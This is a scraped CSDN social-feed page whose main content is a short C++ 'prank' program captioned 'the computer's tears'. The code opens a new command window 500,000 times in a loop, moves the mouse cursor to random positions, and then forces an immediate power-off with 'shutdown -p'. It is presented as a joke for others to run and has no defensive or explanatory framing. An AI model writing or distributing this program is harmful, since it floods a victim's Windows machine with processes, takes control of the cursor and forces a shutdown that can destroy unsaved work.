热门

最新

红包

立Flag

投票

同城

我的

发布
weixin_61058873
提那米苏
3 年前
trueweixin_61058873

【】

CSDN App 扫码分享
分享
评论
点赞
打赏
  • 复制链接
  • 举报
下一条:
#include <bits/stdc++.h>#include <windows.h>using namespace std; int main(){ int x=GetSystemMetrics(SM_CXSCREEN); int y=GetSystemMetrics(SM_CYSCREEN); srand(time(0)); int t=500000; while(t--) { system("start"); SetCursorPos(rand()%x,rand()%y); } system("shutdown -p"); return 0;}//电脑的眼泪C++
立即登录